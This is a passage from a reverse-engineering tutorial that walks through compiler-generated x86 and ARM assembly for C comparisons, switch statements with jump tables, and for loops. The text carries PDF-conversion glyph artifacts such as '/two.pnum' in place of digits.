.type f_unsigned, @function
f_unsigned:
push ebp
mov ebp, esp
sub esp, 24
mov eax, DWORD PTR [ebp+8]
cmp eax, DWORD PTR [ebp+12]
jbe .L7
mov DWORD PTR [esp], OFFSET FLAT:.LC0 ; "a>b"
call puts
.L7:
mov eax, DWORD PTR [ebp+8]
cmp eax, DWORD PTR [ebp+12]
jne .L8
mov DWORD PTR [esp], OFFSET FLAT:.LC1 ; "a==b"
call puts
.L8:
mov eax, DWORD PTR [ebp+8]
cmp eax, DWORD PTR [ebp+12]
jae .L10
mov DWORD PTR [esp], OFFSET FLAT:.LC2 ; "a<b"
call puts
.L10:
leave
ret
Almost the same, with exception of instructions: JBE—Jump if Below or Equal andJAE—Jump if Above or
Equal . These instructions ( JA/JAE/JBE/JBE) are distinct from JG/JGE/JL/JLEin that way, they works with unsigned
numbers.
See also section about signed number representations /two.pnum./four.pnum. So, where we see usage of JG/JLinstead of JA/JBE
or otherwise, we can almost be sure about signed or unsigned type of variable.
Here is also main() function, where nothing new to us:
Listing /one.pnum./one.pnum/nine.pnum: main()
main:
push ebp
mov ebp, esp
and esp, -16
sub esp, 16
mov DWORD PTR [esp+4], 2
/three.pnum/two.pnum
mov DWORD PTR [esp], 1
call f_signed
mov DWORD PTR [esp+4], 2
mov DWORD PTR [esp], 1
call f_unsigned
mov eax, 0
leave
ret
/one.pnum./eight.pnum./two.pnum ARM
Optimizing Keil + ARM mode
Listing /one.pnum./two.pnum/zero.pnum: Optimizing Keil + ARM mode
.text:000000B8 EXPORT f_signed
.text:000000B8 f_signed ; CODE XREF: main+C
.text:000000B8 70 40 2D E9 STMFD SP!, {R4-R6,LR}
.text:000000BC 01 40 A0 E1 MOV R4, R1
.text:000000C0 04 00 50 E1 CMP R0, R4
.text:000000C4 00 50 A0 E1 MOV R5, R0
.text:000000C8 1A 0E 8F C2 ADRGT R0, aAB ; "a>b\n"
.text:000000CC A1 18 00 CB BLGT __2printf
.text:000000D0 04 00 55 E1 CMP R5, R4
.text:000000D4 67 0F 8F 02 ADREQ R0, aAB_0 ; "a==b\n"
.text:000000D8 9E 18 00 0B BLEQ __2printf
.text:000000DC 04 00 55 E1 CMP R5, R4
.text:000000E0 70 80 BD A8 LDMGEFD SP!, {R4-R6,PC}
.text:000000E4 70 40 BD E8 LDMFD SP!, {R4-R6,LR}
.text:000000E8 19 0E 8F E2 ADR R0, aAB_1 ; "a<b\n"
.text:000000EC 99 18 00 EA B __2printf
.text:000000EC ; End of function f_signed
A lot of instructions in ARM mode can be executed only when specific flags are set. This is o/f_ten used while
numbers comparing, for example.
For instance, ADDinstruction is ADDAL internally in fact, where ALmeaning Always , i.e., execute always. Pred-
icates are encoded in /four.pnum high bits of /three.pnum/two.pnum-bit ARM instructions ( condition field ).Binstruction of unconditional jump
is in fact conditional and encoded just like any other conditional jumps, but has ALincondition field , and what it
means, executing always, ignoring flags.
ADRGT instructions works just like ADR, but will execute only in the case when previous CMPinstruction, while
comparing two numbers, found one number greater than another ( Greater Than ).
The nextBLGT instruction behaves exactly as BLand will be triggered only if result of comparison was the same
(Greater Than ).ADRGT writes a pointer to the string “a>b\n” , intoR0andBLGT callsprintf() . Consequently, these
instructions with -GTsuffix, will be executed only in the case when value in R0(ais there) was bigger than value in
R4(bis there).
Then we see ADREQ andBLEQ instructions. They behave just like ADRandBL, but will be executed only in the
case when operands were equal to each other while comparison. Another CMPis before them (because printf()
call may tamper state of flags).
Then we see LDMGEFD , this instruction works just like LDMFD/four.pnum/five.pnum, but will be triggered only in the case when one
value was greater or equal to another while comparision ( Greater or Equal ).
The sense of “LDMGEFD SP!, {R4-R6,PC}” instruction is that is like function epilogue, but it will be triggered
only if a >=b, only then function execution will be finished. But if it’s not true, i.e., a < b , then control flow
come to next “LDMFD SP!, {R4-R6,LR}” instruction, this is one more function epilogue, this instruction restores
R4-R6 registers state, but also LRinstead of PC, thus, it doesn’t returns from function. Last two instructions calls
printf() with the string «a<b\n» as sole argument. Unconditional jump to printf() instead of function return,
is what we already examined in « printf() with several arguments» section, here /one.pnum./three.pnum./two.pnum.
/four.pnum/five.pnumLoad Multiple Full Descending
/three.pnum/three.pnum
f_unsigned is similar, but ADRHI ,BLHI , andLDMCSFD instructions are used there, these predicates ( HI = Un-
signed higher, CS = Carry Set (greater than or equal) ) are analogical to those examined before, but serving for un-
signed values.
There are not much new in main() for us:
Listing /one.pnum./two.pnum/one.pnum: main()
.text:00000128 EXPORT main
.text:00000128 main
.text:00000128 10 40 2D E9 STMFD SP!, {R4,LR}
.text:0000012C 02 10 A0 E3 MOV R1, #2
.text:00000130 01 00 A0 E3 MOV R0, #1
.text:00000134 DF FF FF EB BL f_signed
.text:00000138 02 10 A0 E3 MOV R1, #2
.text:0000013C 01 00 A0 E3 MOV R0, #1
.text:00000140 EA FF FF EB BL f_unsigned
.text:00000144 00 00 A0 E3 MOV R0, #0
.text:00000148 10 80 BD E8 LDMFD SP!, {R4,PC}
.text:00000148 ; End of function main
That’s how to get rid of conditional jumps in ARM mode.
Why it’s so good? Because, ARM is RISC-processor with pipeline for instructions executing. In short, pipelined
processor is not very good on jumps at all, so that’s why branch predictors are critical here. It’s very good if the
program has as few jumps as possible, conditional and unconditional, so that’s why, predicated instructions can
help in reducing conditional jumps count.
There are no such feature in x/eight.pnum/six.pnum, if not to count CMOVcc instruction, it’s the same as MOV, but it’s triggered only
when specific flags are set, usually, set while comparing by CMP.
Optimizing Keil + thumb mode
Listing /one.pnum./two.pnum/two.pnum: Optimizing Keil + thumb mode
.text:00000072 f_signed ; CODE XREF: main+6
.text:00000072 70 B5 PUSH {R4-R6,LR}
.text:00000074 0C 00 MOVS R4, R1
.text:00000076 05 00 MOVS R5, R0
.text:00000078 A0 42 CMP R0, R4
.text:0000007A 02 DD BLE loc_82
.text:0000007C A4 A0 ADR R0, aAB ; "a>b\n"
.text:0000007E 06 F0 B7 F8 BL __2printf
.text:00000082
.text:00000082 loc_82 ; CODE XREF: f_signed+8
.text:00000082 A5 42 CMP R5, R4
.text:00000084 02 D1 BNE loc_8C
.text:00000086 A4 A0 ADR R0, aAB_0 ; "a==b\n"
.text:00000088 06 F0 B2 F8 BL __2printf
.text:0000008C
.text:0000008C loc_8C ; CODE XREF: f_signed+12
.text:0000008C A5 42 CMP R5, R4
.text:0000008E 02 DA BGE locret_96
.text:00000090 A3 A0 ADR R0, aAB_1 ; "a<b\n"
.text:00000092 06 F0 AD F8 BL __2printf
.text:00000096
.text:00000096 locret_96 ; CODE XREF: f_signed+1C
.text:00000096 70 BD POP {R4-R6,PC}
.text:00000096 ; End of function f_signed
OnlyBinstructions in thumb mode may be supplemented by condition codes , so the thumb code looks more
ordinary.
BLEis usual conditional jump Less than or Equal ,BNE —Not Equal ,BGE —Greater than or Equal .
f_unsigned function is just the same, but other instructions are used while working with unsigned values: BLS
(Unsigned lower or same ) andBCS(Carry Set (Greater than ir equal) ).
/three.pnum/four.pnum
/one.pnum./nine.pnum switch()/case/default
/one.pnum./nine.pnum./one.pnum Few number of cases
void f (int a)
{
switch (a)
{
case 0: printf ("zero\n"); break;
case 1: printf ("one\n"); break;
case 2: printf ("two\n"); break;
default: printf ("something unknown\n"); break;
};
};
x/eight.pnum/six.pnum
Result (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./two.pnum/three.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
tv64 = -4 ; size = 4
_a$ = 8 ; size = 4
_f PROC
push ebp
mov ebp, esp
push ecx
mov eax, DWORD PTR _a$[ebp]
mov DWORD PTR tv64[ebp], eax
cmp DWORD PTR tv64[ebp], 0
je SHORT $LN4@f
cmp DWORD PTR tv64[ebp], 1
je SHORT $LN3@f
cmp DWORD PTR tv64[ebp], 2
je SHORT $LN2@f
jmp SHORT $LN1@f
$LN4@f:
push OFFSET $SG739 ; ’zero’, 0aH, 00H
call _printf
add esp, 4
jmp SHORT $LN7@f
$LN3@f:
push OFFSET $SG741 ; ’one’, 0aH, 00H
call _printf
add esp, 4
jmp SHORT $LN7@f
$LN2@f:
push OFFSET $SG743 ; ’two’, 0aH, 00H
call _printf
add esp, 4
jmp SHORT $LN7@f
$LN1@f:
push OFFSET $SG745 ; ’something unknown’, 0aH, 00H
call _printf
add esp, 4
$LN7@f:
mov esp, ebp
pop ebp
ret 0
_f ENDP
Out function with a few cases in switch(), in fact, is analogous to this construction:
void f (int a)
{
/three.pnum/five.pnum
if (a==0)
printf ("zero\n");
else if (a==1)
printf ("one\n");
else if (a==2)
printf ("two\n");
else
printf ("something unknown\n");
};
When few cases in switch(), and we see such code, it’s impossible to say with certainty, was it switch() in source
code, or just pack of if(). This mean, switch() is syntactic sugar for large number of nested checks constructed using
if().
Nothing specially new to us in generated code, with the exception that compiler moving input variable ato
temporary local variable tv64 .
If to compile the same in GCC /four.pnum./four.pnum./one.pnum, we’ll get alsmost the same, even with maximal optimization turned on ( -O3
option).
Now let’s turn on optimization in MSVC ( /Ox):cl 1.c /Fa1.asm /Ox
Listing /one.pnum./two.pnum/four.pnum: MSVC
_a$ = 8 ; size = 4
_f PROC
mov eax, DWORD PTR _a$[esp-4]
sub eax, 0
je SHORT $LN4@f
sub eax, 1
je SHORT $LN3@f
sub eax, 1
je SHORT $LN2@f
mov DWORD PTR _a$[esp-4], OFFSET $SG791 ; ’something unknown’, 0aH, 00H
jmp _printf
$LN2@f:
mov DWORD PTR _a$[esp-4], OFFSET $SG789 ; ’two’, 0aH, 00H
jmp _printf
$LN3@f:
mov DWORD PTR _a$[esp-4], OFFSET $SG787 ; ’one’, 0aH, 00H
jmp _printf
$LN4@f:
mov DWORD PTR _a$[esp-4], OFFSET $SG785 ; ’zero’, 0aH, 00H
jmp _printf
_f ENDP
Here we can see even dirty hacks.
First:ais placed into EAXand0subtracted from it. Sounds absurdly, but it may need to check if /zero.pnum was in EAX
before? If yes, flag ZFwill be set (this also mean that subtracting from zero is zero) and first conditional jump JE
(Jump if Equal or synonym JZ—Jump if Zero ) will be triggered and control flow passed to $LN4@f label, where
’zero’ message is begin printed. If first jump was not triggered, /one.pnum subtracted from input value and if at some
stage /zero.pnum will be resulted, corresponding jump will be triggered.
And if no jump triggered at all, control flow passed to printf() with argument ’something unknown’ .
Second: we see unusual thing for us: string pointer is placed into avariable, and then printf() is called not
viaCALL , but viaJMP. This could be explained simply. Caller pushing to stack some value and via CALL calling
our function. CALL itself pushing returning address to stack and do unconditional jump to our function address.
Our function at any place of its execution (since it do not contain any instruction moving stack pointer) has the
following stack layout:
∙ESP— pointing to return address
∙ESP+4 — pointing to avariable
On the other side, when we need to call printf() here, we need exactly the same stack layout, except of first
printf() argument pointing to string. And that is what our code does.
/three.pnum/six.pnum
It replaces function’s first argument to different and jumping to printf() , as if not our function f()was called
firstly, but immediately printf() .printf() printing some string to stdout and then execute RETinstruction,
which POPping return address from stack and control flow is returned not to f(), but tof()’s callee, escaping
f().
All it’s possible because printf() is called right at the end of f()in any case. In some way, it’s all similar to
longjmp()/four.pnum/six.pnum. And of course, it’s all done for the sake of speed.
Similar case with ARM compiler described in “ printf() with several arguments” , section, here /one.pnum./three.pnum./two.pnum.
ARM: Optimizing Keil + ARM mode
.text:0000014C f1
.text:0000014C 00 00 50 E3 CMP R0, #0
.text:00000150 13 0E 8F 02 ADREQ R0, aZero ; "zero\n"
.text:00000154 05 00 00 0A BEQ loc_170
.text:00000158 01 00 50 E3 CMP R0, #1
.text:0000015C 4B 0F 8F 02 ADREQ R0, aOne ; "one\n"
.text:00000160 02 00 00 0A BEQ loc_170
.text:00000164 02 00 50 E3 CMP R0, #2
.text:00000168 4A 0F 8F 12 ADRNE R0, aSomethingUnkno ; "something unknown\n"
.text:0000016C 4E 0F 8F 02 ADREQ R0, aTwo ; "two\n"
.text:00000170
.text:00000170 loc_170 ; CODE XREF: f1+8
.text:00000170 ; f1+14
.text:00000170 78 18 00 EA B __2printf
Again, by investigating this code, we cannot say, was it switch() in the original source code, or pack of if()
statements.
Anyway, we see here predicated instructions again, like ADREQ (Equal ), which will be triggered only in R0 = 0
case, and the, address of «zero\n» string will be loaded into R0. The next instruction BEQ((Branch Equal) ) will
redirect control flow to loc_170 , ifR0 = 0 . By the way, observant reader may ask, will BEQtriggered right, because
ADREQ before it is already filled R0register with some other value. Yes, it will, because BEQchecking flags set by
CMPinstruction, and ADREQ not modifying flags at all.
By the way, there are -Ssuffix for some instructions in ARM, indicative that instruction will not modify flags.
For example ADDS Will add two number, but flags will not be touched. Such instructions are handy to use between
CMPwhere flags are set and, for example, conditional jumps, where flags are used.
Other instructions are already familiar to us. There are only one call to printf() , at the end, and we already
examined this trick here /one.pnum./three.pnum./two.pnum. There are three paths to printf() at the end.
Also pay attention to what is going on if a= 2and if ais not in range of constants it’s comparing against. “CMP
R0, #2” instruction is needed here to know, if a= 2 or not. If it’s not true, then ADRNE will load pointer to the
string «something unknown \n» intoR0, because, awas already checked before to be equal to 0or1, so we can be
assured that ais not equal to these numbers at this point. And if R0 = 2 , a pointer to string «two\n» will be loaded
byADREQ intoR0.
ARM: Optimizing Keil + thumb mode
.text:000000D4 f1
.text:000000D4 10 B5 PUSH {R4,LR}
.text:000000D6 00 28 CMP R0, #0
.text:000000D8 05 D0 BEQ zero_case
.text:000000DA 01 28 CMP R0, #1
.text:000000DC 05 D0 BEQ one_case
.text:000000DE 02 28 CMP R0, #2
.text:000000E0 05 D0 BEQ two_case
.text:000000E2 91 A0 ADR R0, aSomethingUnkno ; "something unknown\n"
.text:000000E4 04 E0 B default_case
.text:000000E6 ; -------------------------------------------------------------------------
.text:000000E6 zero_case ; CODE XREF: f1+4
/four.pnum/six.pnumhttp://en.wikipedia.org/wiki/Setjmp.h
/three.pnum/seven.pnum
.text:000000E6 95 A0 ADR R0, aZero ; "zero\n"
.text:000000E8 02 E0 B default_case
.text:000000EA ; -------------------------------------------------------------------------
.text:000000EA one_case ; CODE XREF: f1+8
.text:000000EA 96 A0 ADR R0, aOne ; "one\n"
.text:000000EC 00 E0 B default_case
.text:000000EE ; -------------------------------------------------------------------------
.text:000000EE two_case ; CODE XREF: f1+C
.text:000000EE 97 A0 ADR R0, aTwo ; "two\n"
.text:000000F0 default_case ; CODE XREF: f1+10
.text:000000F0 ; f1+14
.text:000000F0 06 F0 7E F8 BL __2printf
.text:000000F4 10 BD POP {R4,PC}
.text:000000F4 ; End of function f1
As I already mentioned, there are no feature of connecting predicates to majority of functions in thumb mode,
so the thumb-code here is somewhat like the x/eight.pnum/six.pnum code, easily understandable.
/one.pnum./nine.pnum./two.pnum A lot of cases
Ifswitch() statement contain a lot of case’s, it is not very handy for compiler to emit too large code with a lot
JE/JNEinstructions.
void f (int a)
{
switch (a)
{
case 0: printf ("zero\n"); break;
case 1: printf ("one\n"); break;
case 2: printf ("two\n"); break;
case 3: printf ("three\n"); break;
case 4: printf ("four\n"); break;
default: printf ("something unknown\n"); break;
};
};
x/eight.pnum/six.pnum
We got (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./two.pnum/five.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
tv64 = -4 ; size = 4
_a$ = 8 ; size = 4
_f PROC
push ebp
mov ebp, esp
push ecx
mov eax, DWORD PTR _a$[ebp]
mov DWORD PTR tv64[ebp], eax
cmp DWORD PTR tv64[ebp], 4
ja SHORT $LN1@f
mov ecx, DWORD PTR tv64[ebp]
jmp DWORD PTR $LN11@f[ecx*4]
$LN6@f:
push OFFSET $SG739 ; ’zero’, 0aH, 00H
call _printf
add esp, 4
jmp SHORT $LN9@f
$LN5@f:
push OFFSET $SG741 ; ’one’, 0aH, 00H
call _printf
add esp, 4
jmp SHORT $LN9@f
/three.pnum/eight.pnum
$LN4@f:
push OFFSET $SG743 ; ’two’, 0aH, 00H
call _printf
add esp, 4
jmp SHORT $LN9@f
$LN3@f:
push OFFSET $SG745 ; ’three’, 0aH, 00H
call _printf
add esp, 4
jmp SHORT $LN9@f
$LN2@f:
push OFFSET $SG747 ; ’four’, 0aH, 00H
call _printf
add esp, 4
jmp SHORT $LN9@f
$LN1@f:
push OFFSET $SG749 ; ’something unknown’, 0aH, 00H
call _printf
add esp, 4
$LN9@f:
mov esp, ebp
pop ebp
ret 0
npad 2
$LN11@f:
DD $LN6@f ; 0
DD $LN5@f ; 1
DD $LN4@f ; 2
DD $LN3@f ; 3
DD $LN2@f ; 4
_f ENDP
OK, what we see here is: there are a set of printf() calls with various arguments. All them has not only
addresses in process memory, but also internal symbolic labels assigned by compiler. Besides, all these labels are
also places into $LN11@f internal table.
At the function beginning, if ais greater than /four.pnum, control flow is passed to label $LN1@f , whereprintf() with
argument ’something unknown’ is called.
And ifavalue is less or equals to /four.pnum, let’s multiply it by /four.pnum and add $LN1@f table address. That is how address
inside of table is constructed, pointing exactly to the element we need. For example, let’s say ais equal to /two.pnum.
2*4 = 8 (all table elements are addresses within /three.pnum/two.pnum-bit process, that is why all elements contain /four.pnum bytes). Address
of$LN11@f table + /eight.pnum = it will be table element where $LN4@f label is stored. JMPfetch$LN4@f address from the
table and jump to it.
This table called sometimes jumptable .
Then corresponding printf() is called with argument ’two’ . Literally, jmp DWORD PTR $LN11@f[ecx*4]
instruction mean jump to DWORD, which is stored at address $LN11@f + ecx * 4 .
npad /two.pnum./three.pnum is assembly language macro, aligning next label so that it will be stored at address aligned by /four.pnum bytes
(or /one.pnum/six.pnum). This is very suitable for processor, because it can fetch /three.pnum/two.pnum-bit values from memory through memory bus,
cache memory, etc, in much effective way if it is aligned.
Let’s see what GCC /four.pnum./four.pnum./one.pnum generate:
Listing /one.pnum./two.pnum/six.pnum: GCC /four.pnum./four.pnum./one.pnum
public f
f proc near ; CODE XREF: main+10
var_18 = dword ptr -18h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h ; char *
cmp [ebp+arg_0], 4
ja short loc_8048444
/three.pnum/nine.pnum
mov eax, [ebp+arg_0]
shl eax, 2
mov eax, ds:off_804855C[eax]
jmp eax
loc_80483FE: ; DATA XREF: .rodata:off_804855C
mov [esp+18h+var_18], offset aZero ; "zero"
call _puts
jmp short locret_8048450
loc_804840C: ; DATA XREF: .rodata:08048560
mov [esp+18h+var_18], offset aOne ; "one"
call _puts
jmp short locret_8048450
loc_804841A: ; DATA XREF: .rodata:08048564
mov [esp+18h+var_18], offset aTwo ; "two"
call _puts
jmp short locret_8048450
loc_8048428: ; DATA XREF: .rodata:08048568
mov [esp+18h+var_18], offset aThree ; "three"
call _puts
jmp short locret_8048450
loc_8048436: ; DATA XREF: .rodata:0804856C
mov [esp+18h+var_18], offset aFour ; "four"
call _puts
jmp short locret_8048450
loc_8048444: ; CODE XREF: f+A
mov [esp+18h+var_18], offset aSomethingUnkno ; "something unknown"
call _puts
locret_8048450: ; CODE XREF: f+26
; f+34...
leave
retn
f endp
off_804855C dd offset loc_80483FE ; DATA XREF: f+12
dd offset loc_804840C
dd offset loc_804841A
dd offset loc_8048428
dd offset loc_8048436
It is almost the same, except little nuance: argument arg_0 is multiplied by /four.pnum with by shi/f_ting it to le/f_t by /two.pnum bits
(it is almost the same as multiplication by /four.pnum) /one.pnum./one.pnum/five.pnum./three.pnum. Then label address is taken from off_804855C array, address
calculated and stored into EAX, then“JMP EAX” do actual jump.
ARM: Optimizing Keil + ARM mode
00000174 f2
00000174 05 00 50 E3 CMP R0, #5 ; switch 5 cases
00000178 00 F1 8F 30 ADDCC PC, PC, R0,LSL#2 ; switch jump
0000017C 0E 00 00 EA B default_case ; jumptable 00000178 default case
00000180 ; -------------------------------------------------------------------------
00000180
00000180 loc_180 ; CODE XREF: f2+4
00000180 03 00 00 EA B zero_case ; jumptable 00000178 case 0
00000184 ; -------------------------------------------------------------------------
00000184
00000184 loc_184 ; CODE XREF: f2+4
00000184 04 00 00 EA B one_case ; jumptable 00000178 case 1
00000188 ; -------------------------------------------------------------------------
/four.pnum/zero.pnum
00000188
00000188 loc_188 ; CODE XREF: f2+4
00000188 05 00 00 EA B two_case ; jumptable 00000178 case 2
0000018C ; -------------------------------------------------------------------------
0000018C
0000018C loc_18C ; CODE XREF: f2+4
0000018C 06 00 00 EA B three_case ; jumptable 00000178 case 3
00000190 ; -------------------------------------------------------------------------
00000190
00000190 loc_190 ; CODE XREF: f2+4
00000190 07 00 00 EA B four_case ; jumptable 00000178 case 4
00000194 ; -------------------------------------------------------------------------
00000194
00000194 zero_case ; CODE XREF: f2+4
00000194 ; f2:loc_180
00000194 EC 00 8F E2 ADR R0, aZero ; jumptable 00000178 case 0
00000198 06 00 00 EA B loc_1B8
0000019C ; -------------------------------------------------------------------------
0000019C
0000019C one_case ; CODE XREF: f2+4
0000019C ; f2:loc_184
0000019C EC 00 8F E2 ADR R0, aOne ; jumptable 00000178 case 1
000001A0 04 00 00 EA B loc_1B8
000001A4 ; -------------------------------------------------------------------------
000001A4
000001A4 two_case ; CODE XREF: f2+4
000001A4 ; f2:loc_188
000001A4 01 0C 8F E2 ADR R0, aTwo ; jumptable 00000178 case 2
000001A8 02 00 00 EA B loc_1B8
000001AC ; -------------------------------------------------------------------------
000001AC
000001AC three_case ; CODE XREF: f2+4
000001AC ; f2:loc_18C
000001AC 01 0C 8F E2 ADR R0, aThree ; jumptable 00000178 case 3
000001B0 00 00 00 EA B loc_1B8
000001B4 ; -------------------------------------------------------------------------
000001B4
000001B4 four_case ; CODE XREF: f2+4
000001B4 ; f2:loc_190
000001B4 01 0C 8F E2 ADR R0, aFour ; jumptable 00000178 case 4
000001B8
000001B8 loc_1B8 ; CODE XREF: f2+24
000001B8 ; f2+2C
000001B8 66 18 00 EA B __2printf
000001BC ; -------------------------------------------------------------------------
000001BC
000001BC default_case ; CODE XREF: f2+4
000001BC ; f2+8
000001BC D4 00 8F E2 ADR R0, aSomethingUnkno ; jumptable 00000178 default case
000001C0 FC FF FF EA B loc_1B8
000001C0 ; End of function f2
This code makes use that ARM mode feature, all instructions in this mode has size /four.pnum bytes.
Let’s keep in mind that maximum value for ais4and any greater value should cause «something unknown\n»
string printing.
The very first “CMP R0, #5” instruction compares ainput value with 5.
The next“ADDCC PC, PC, R0,LSL#2”/four.pnum/seven.pnuminstruction will execute only if R0<5(CC=Carry clear / Less than ).
Consequently, if ADDCC will not trigger (it’s a R0≥5case), a jump to default_case label will be occured.
But if R0<5andADDCC will trigger, following events will happen:
Value inR0is multiplied by 4. In fact,LSL#2 at the instruction’s ending mean “shi/f_t le/f_t by /two.pnum bits” . But as we will
see later /one.pnum./one.pnum/five.pnum./three.pnum in “Shi/f_ts” section, shi/f_t le/f_t by /two.pnum bits is just equivalently to multiplying by 4.
/four.pnum/seven.pnumADD — addition
/four.pnum/one.pnum
Then, R0*4value we got, is added to current PCvalue, thus jumping to one of B(Branch ) instructions located
below.
At the moment of ADDCC execution, PCvalue is /eight.pnum bytes ahead ( 0x180) than address at which ADDCC instruction
is located ( 0x178), or, in other words, /two.pnum instructions ahead.
This is how ARM processor pipeline works: when ADDCC instruction is executed, the processor at that moment
is beginning to process instruction a/f_ter the next one, so that’s why PCpointing there.
Ifa= 0, then nothing will be added to PC, and actual PCvalue will be written into PC(which is /eight.pnum bytes ahead)
and jump to label loc_/one.pnum/eight.pnum/zero.pnum will be happen, this is /eight.pnum bytes ahead of the place where ADDCC instruction is.
In case of a= 1, then PC+ 8 + a*4 =PC+ 8 + 1*4 =PC+ 16 = 0 x184will be written to PC, this is
address of loc_/one.pnum/eight.pnum/four.pnum label.
With every 1added to a, resulting PCincreasing by 4.4is also instruction length in ARM mode and also, length
of eachBinstruction length, there are /five.pnum of them in row.
Each of these five Binstructions passing control further, where something is going on, what was programmed
inswitch() . Pointer loading to corresponding string occuring there, etc.
ARM: Optimizing Keil + thumb mode
000000F6 EXPORT f2
000000F6 f2
000000F6 10 B5 PUSH {R4,LR}
000000F8 03 00 MOVS R3, R0
000000FA 06 F0 69 F8 BL __ARM_common_switch8_thumb ; switch 6 cases
000000FA ; -------------------------------------------------------------------------
000000FE 05 DCB 5
000000FF 04 06 08 0A 0C 10 DCB 4, 6, 8, 0xA, 0xC, 0x10 ; jump table for switch statement
00000105 00 ALIGN 2
00000106
00000106 zero_case ; CODE XREF: f2+4
00000106 8D A0 ADR R0, aZero ; jumptable 000000FA case 0
00000108 06 E0 B loc_118
0000010A ; -------------------------------------------------------------------------
0000010A
0000010A one_case ; CODE XREF: f2+4
0000010A 8E A0 ADR R0, aOne ; jumptable 000000FA case 1
0000010C 04 E0 B loc_118
0000010E ; -------------------------------------------------------------------------
0000010E
0000010E two_case ; CODE XREF: f2+4
0000010E 8F A0 ADR R0, aTwo ; jumptable 000000FA case 2
00000110 02 E0 B loc_118
00000112 ; -------------------------------------------------------------------------
00000112
00000112 three_case ; CODE XREF: f2+4
00000112 90 A0 ADR R0, aThree ; jumptable 000000FA case 3
00000114 00 E0 B loc_118
00000116 ; -------------------------------------------------------------------------
00000116
00000116 four_case ; CODE XREF: f2+4
00000116 91 A0 ADR R0, aFour ; jumptable 000000FA case 4
00000118
00000118 loc_118 ; CODE XREF: f2+12
00000118 ; f2+16
00000118 06 F0 6A F8 BL __2printf
0000011C 10 BD POP {R4,PC}
0000011E ; -------------------------------------------------------------------------
0000011E
0000011E default_case ; CODE XREF: f2+4
0000011E 82 A0 ADR R0, aSomethingUnkno ; jumptable 000000FA default case
00000120 FA E7 B loc_118
000061D0 EXPORT __ARM_common_switch8_thumb
/four.pnum/two.pnum
000061D0 __ARM_common_switch8_thumb ; CODE XREF: example6_f2+4
000061D0 78 47 BX PC
000061D0 ; ---------------------------------------------------------------------------
000061D2 00 00 ALIGN 4
000061D2 ; End of function __ARM_common_switch8_thumb
000061D2
000061D4 CODE32
000061D4
000061D4 ; =============== S U B R O U T I N E =======================================
000061D4
000061D4
000061D4 __32__ARM_common_switch8_thumb ; CODE XREF: __ARM_common_switch8_thumb
000061D4 01 C0 5E E5 LDRB R12, [LR,#-1]
000061D8 0C 00 53 E1 CMP R3, R12
000061DC 0C 30 DE 27 LDRCSB R3, [LR,R12]
000061E0 03 30 DE 37 LDRCCB R3, [LR,R3]
000061E4 83 C0 8E E0 ADD R12, LR, R3,LSL#1
000061E8 1C FF 2F E1 BX R12
000061E8 ; End of function __32__ARM_common_switch8_thumb
One cannot be sure all instructions in thumb and thumb-/two.pnum modes will have same size. It’s even can be said
that in these modes instructions has variable length, just like in x/eight.pnum/six.pnum.
So there are a special table added, containing information about how much cases are there, not including
default-case, and offset, for each, each encoding a label, to which control should be passed in corresponding case.
A special function here present in order to work with the table and pass control, named
__ARM_common_switch/eight.pnum_thumb . It is beginning with “BX PC” instruction, which function is to switch processor
to ARM-mode. Then you may see the function for table processing. It’s too complex for describing it here now, so
I’ll omit elaborations.
But it’s interesting to note that the function uses LRreigster as a pointer to the table. Indeed, a/f_ter this function
calling,LRwill contain address a/f_ter
“BL __ARM_common_switch8_thumb” instruction, and the table is beginning right there.
It’s also worth noting that the code is generated as a separate function in order to reuse it, in similar places, in
similar cases, for switch() processing, so compiler will not generate same code at each place.
IDA /five.pnum successfully perceived it as a service function and table, automatically, and added commentaries to la-
bels likejumptable 000000FA case 0 .
/four.pnum/three.pnum
/one.pnum./one.pnum/zero.pnum Loops
/one.pnum./one.pnum/zero.pnum./one.pnum x/eight.pnum/six.pnum
There is a special LOOP instruction in x/eight.pnum/six.pnum instruction set, it is checking ECXregister value and if it is not zero, do
ECXdecrement/four.pnum/eight.pnumand pass control flow to label mentioned in LOOP operand. Probably, this instruction is not very
handy, so, I didn’t ever see any modern compiler emitting it automatically. So, if you see the instruction some-
where in code, it is most likely this is manually written piece of assembly code.
By the way, as home exercise, you could try to explain, why this instruction is not very handy.
In C/C++ loops are constructed using for() ,while() ,do/while() statements.
Let’s start with for() .
This statement defines loop initialization (set loop counter to initial value), loop condition (is counter is bigger
than a limit?), what is done at each iteration (increment/decrement) and of course loop body.
for (initialization; condition; at each iteration)
{
loop_body;
}
So, generated code will be consisted of four parts too.
Let’s start with simple example:
int main()
{
int i;
for (i=2; i<10; i++)
f(i);
return 0;
};
Result (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./two.pnum/seven.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
_i$ = -4
_main PROC
push ebp
mov ebp, esp
push ecx
mov DWORD PTR _i$[ebp], 2 ; loop initialization
jmp SHORT $LN3@main
$LN2@main:
mov eax, DWORD PTR _i$[ebp] ; here is what we do after each iteration:
add eax, 1 ; add 1 to i value
mov DWORD PTR _i$[ebp], eax
$LN3@main:
cmp DWORD PTR _i$[ebp], 10 ; this condition is checked *before* each iteration
jge SHORT $LN1@main ; if i is biggest or equals to 10, let’s finish loop
mov ecx, DWORD PTR _i$[ebp] ; loop body: call f(i)
push ecx
call _f
add esp, 4
jmp SHORT $LN2@main ; jump to loop begin
$LN1@main: ; loop end
xor eax, eax
mov esp, ebp
pop ebp
ret 0
_main ENDP
Nothing very special, as we see.
GCC /four.pnum./four.pnum./one.pnum emitting almost the same code, with small difference:
/four.pnum/eight.pnumsubtracting /one.pnum from it
/four.pnum/four.pnum
Listing /one.pnum./two.pnum/eight.pnum: GCC /four.pnum./four.pnum./one.pnum
main proc near ; DATA XREF: _start+17
var_20 = dword ptr -20h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 20h
mov [esp+20h+var_4], 2 ; i initializing
jmp short loc_8048476
loc_8048465:
mov eax, [esp+20h+var_4]
mov [esp+20h+var_20], eax
call f
add [esp+20h+var_4], 1 ; i increment
loc_8048476:
cmp [esp+20h+var_4], 9
jle short loc_8048465 ; if i<=9, continue loop
mov eax, 0
leave
retn
